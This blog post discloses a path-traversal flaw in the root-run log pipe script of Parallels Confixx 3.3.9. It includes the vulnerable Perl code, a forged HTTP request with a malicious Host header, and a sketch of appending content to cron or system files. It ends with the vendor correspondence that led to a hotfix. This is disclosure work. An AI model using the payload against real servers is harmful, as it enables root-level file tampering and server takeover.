A proof of concept of a vulnerability in Parallels Confixx 3.3.9 (latest and final version) allowing an attacker to gain full write access (as root) to a UNIX server operating said hosting software.
## Preface
**There is a [hotfix available][hotfix] that mitigates the issue.**
Sadly, however, I didn’t get my brownie points 🙁
[hotfix]: http://kb.parallels.com/en/115857
## The vulnerability
[Parallels Confixx][1] is a German-developed web hosting control panel and a product acquired by [SWsoft][2]. It is used to administer UNIX- or Windows-Servers allowing to host and set up multiple domains belonging to different users (“web-accounts”). This software, however, isn’t developed on any further; its replacement is the wider known [Parallels Plesk Panel][4].
In order to provide users their own statistics regarding access to their web-site, a global `CustomLog` is set up in Apache’s configuration. The custom log handler’s target is a pipe to a perl script (**pipelog.pl**):
# file is /etc/apache2/confixx_vhost.conf
LogFormat "%V:#:%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" confixx
CustomLog |/root/confixx/pipelog.pl confixx
The pipe is opened by Apache during start-up and remains open the whole time; it’s a process spawned with root-privileges. The contents of the file are as follows:
#!/usr/bin/perl
###### Confixx-Apache-PipeLog
## zum Loggen der Webzugriffe pro User
########## erstellt am Wed Jan 6 02:30:00 1982 ###
$logDir = "/var/log/apache2/confixx/domains/access";
$stdLog = "/var/log/apache2/confixx/stdlog_access";
while(){
($domain, $log) = split(/:#?:/, $_, 2);
$domain = lc($domain);
$logfile = "$logDir/$domain";
$worked = 0;
if(-l $logfile){
$target = readlink($logfile);
unless(-l $target){
if(open(LOG, ">>$logfile")){
print LOG $log;
close(LOG);
$worked=1;
}
}
}
unless($worked){
open(LOG, ">>$stdLog") or next;
print LOG "$domain :: $log";
close(LOG);
}
}
The vulnerability’s culprit is the `%V` formatter of the `LogFormat` directive, which according to the [docs][3] means *”The server name according to the UseCanonicalName setting.”*
This *”server name”*, however, will be nothing else but whatever the connecting client provides in the HTTP request’s `Host` field (given a set of certain pre-conditions; see [Why is HTTP_HOST evil?](/2011/02/why-http_host-is-evil/)).
[1]: http://www.parallels.com/de/products/confixx/
[2]: http://en.wikipedia.org/wiki/SWsoft
[3]: http://httpd.apache.org/docs/2.2/mod/mod_log_config.html#formats
[4]: http://www.parallels.com/products/plesk/
## Proof of concept
I stipulate, that, given a forged request, one can obtain full write access to a (UNIX) server running on Confixx.
The request would have to look like this:
GET / HTTP/1.1
Host: ../../../../../../root/confixx/counter_script.pl
User-Agent: Something
Through careless concatenation of the *assumed* domain name with a pre-defined path (line 10 of the code above), the actual file `$logfile` points to is now:
/var/log/apache2/confixx/domains/access/../../../../../../root/confixx/counter_script.pl
Which conveniently maps to **/root/confixx/counter_script.pl** which is a symlink pointing to another Perl script in the same directory called **confixx_updatescript.pl**. The exploit’s target file actually *needs* to be a symlink (line 12) for it to work. **The intended access log line will now be appended to the file the symlink is pointing to.**
## The vulnerability’s effects
This post’s headline is “Write anywhere vulnerability” because it would be theoretically possible (given a non-privileged account on the target machine) to highjack the entire box by creating an *own* symlink that points to a file in, let’s say `/etc/cron.daily` of which we know that it’s executable and most likely a shell script and append it accordingly…
I haven’t gone to full lengths as to which extent this is actually *useful*; still there’s the undeniable possibility of at least “wrecking” a server running Confixx by appending useless stuff to symlink targets in e.g. `/usr/bin/` and thus breaking vital system executables. Thus, this would probably classify as a DOS vulnerability.
Plus, there are two more vectors at the attacker’s disposal, both of which are “user defined” request headers (`User-Agent` and `Referer`) and are appended to the target file.
## Updates
The following are conversations with a member of **Parallels, Inc.** support staff who shall be called “Samuel” henceforth for obvious privacy reasons.
### October 11th, 2012
*Reported issue to Confixx Support Team of Parallels Inc.*
**Outbound:**
> Dear Sir or Madam,
>
> I’ve been referred to this address by EMEA Sales Headquarters, Munich to report my issue.
>
> I found a security issue in Parallels Confixx 3.3.9 (Unix) with which one gains full (root) write access to the server’s file system. I understand Confixx has reached its end of lifetime and will not be developed on any further. The issue, however, should be part of a hotfix.
>
> Kindly have the department in charge of these kinds of issues contact me.
>
> Kind regards,
> Oliver Schieche
**Inbound:**
*Note:* “Samuel” steps in to answer my mail. Though his signature shows him to be a “sales person”, he is the only contact I had in dealing with the issue. Actually, there was a previous mail from “Samuel” asking me to explain the issue in detail. This mail isn’t quoted here, since it’s irrelevant. In it, though, I stated the link to this post and the password. This was the reply:
> Hello Oliver,
>
> thank you for the forwarding the problem.
> I have forwarded the problem to our developers. Please don’t change the password to your post.
> I will keep you updated.
>
> Mit freundlichen Grüßen / Best Regards,
>
> \-\-
>
> Samuel
> Sales Engineer
> Parallels
### October 26th, 2012
*Received feedback from “Samuel”: they fixed the issue.*
> Hi Oliver,
>
> we solved the issue. Please find attached the new pipelog.pl
>
>
> Mit freundlichen Grüßen / Best Regards,
> \-\-
> Samuel
> Sales Engineer
> Parallels
>
> Knowledge Base: http://kb.parallels.com
*I asked when I could publish this article pending an official statement of Parallels Inc. concerning the issue.*
**Outbound:**
> Hi Samuel,
>
> thanks for the update. When will this fix be deployed? I’d like to
> publish my post, but not without properly linking to a solution…
**Inbound:**
> Hello Oliver,
>
> We are going to publish an article. But when this article will be published I don’t know unfortunately.
>
> Best Regards,
> Samuel
### March 19th, 2013
*Trying to get an update on things*
> Hello Parallels Support Team,
>
> a long time has passed since our last correspondence regarding the security issue, but I haven’t heard of you since. Is there an advisory or any such thing I can update my post with to publish it?
>
> Regards,
> Oliver Schieche
### March 28th, 2013
*Received last mail from “Samuel”: the issue was posted in their KB.*
> Hello Oliver,
>
> We have published it:
>
> http://kb.parallels.com/en/115857
>
> Best Regards,
> Samuel